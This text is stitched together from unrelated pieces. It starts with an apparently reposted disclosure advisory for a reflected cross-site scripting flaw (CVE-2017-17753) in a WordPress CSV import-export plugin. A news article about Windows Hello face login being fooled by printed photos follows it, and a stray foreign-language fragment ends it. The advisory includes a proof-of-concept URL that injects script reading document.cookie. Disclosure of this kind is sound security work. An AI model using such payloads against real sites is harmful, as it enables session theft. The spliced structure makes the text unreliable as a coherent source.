WordPress CSV Import-Export plugin version 1.1 suffers from a cross site scripting vulnerability. Product: CSV Import-Export Wordpress Plugin - https://wordpress.org/plugins/csv-import-export/ Vendor: eSparkBiz Tested version: 1.1 CVE ID: CVE-2017-17753 ** CVE description ** Multiple cross-site scripting (XSS) vulnerabilities in the esb-csv-import-export plugin through 1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) cie_type, (2) cie_import, (3) cie_update, or (4) cie_ignore parameter to includes/admin/views/esb-cie-import-export-page.php. ** Technical details ** In the conditional block at includes/admin/views/esb-cie-import-export-page.php:21, the cie_type, cie_import, cie_update and cie_ignore HTTP GET parameters are echoed back to user without proper sanitization. Vulnerable code: https://plugins.trac.wordpress.org/browser/csv-import-export/trunk/includes/admin/views/esb-cie-import-export-page.php#L21 ** Proof of Concept ** http://<host>/wordpress/wp-admin/admin.php?page=esb-cie-import-export-page&cie_ignore=<script>alert(document.cookie);</script> ** Solution ** No fix available yet. ** Timeline ** 12/10/2017: vendor contacted; no reply 24/10/2017: vendor contacted; no reply 31/10/2017: vendor contacted; vendor asks for more details then stops replying 05/12/2017: vendor contacted; no reply 19/12/2017: report published ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI) _________________________________________________________________________________________________________________________ Ce message et ses pieces jointes peuvent contenir des informations confidentielles ou privilegiees et ne doivent donc pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce message par erreur, veuillez le signaler a l'expediteur et le detruire ainsi que les pieces jointes. Les messages electroniques etant susceptibles d'alteration, Orange decline toute responsabilite si ce message a ete altere, deforme ou falsifie. Merci. This message and its attachments may contain confidential or privileged information that may be protected by law; they should not be distributed, used or copied without authorisation. If you have received this email in error, please notify the sender and delete this message and its attachments. As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified. Thank you. # 0day.today [2017-12-20] # Source: 0day.today

After you update, set it up again from scratch If you've skipped recent Windows 10 Creators Updates, here's a reason to change your mind: its facial recognition security feature, Hello, can be spoofed with a photograph. The vulnerability was announced by German pentest outfit Syss at Full Disclosure. Even if you've installed the fixed versions that shipped in October – builds 1703 or 1709 – facial recognition has to be set up from scratch to make it resistant to the attack. The “simple spoofing attacks” described in the post are all variations on using a “modified printed photo of an authorised user” (a frontal photo, naturally) so an attacker can log into a locked Windows 10 system. On vulnerable versions, both the default config, and Windows Hello with its “enhanced anti-spoofing” feature enabled, Syss claimed. “If 'enhanced anti-spoofing' is enabled, depending on the targeted Windows 10 version, a slightly different modified photo with other attributes has to be used, but the additional effort for an attacker is negligible.” The researchers tested their attack against a Dell Latitude running Windows 10 Pro, build 1703; and a Microsoft Surface Pro running 4 build 1607. They tried to change the Surface Pro's config to “enhanced anti-spoofing”, but claimed its “LilBit USB IR camera only supported the default configuration and could not be used with the more secure face recognition settings.” The researchers published three proof-of-concept videos, below. ® Via theregister.co.uk

dai allow din router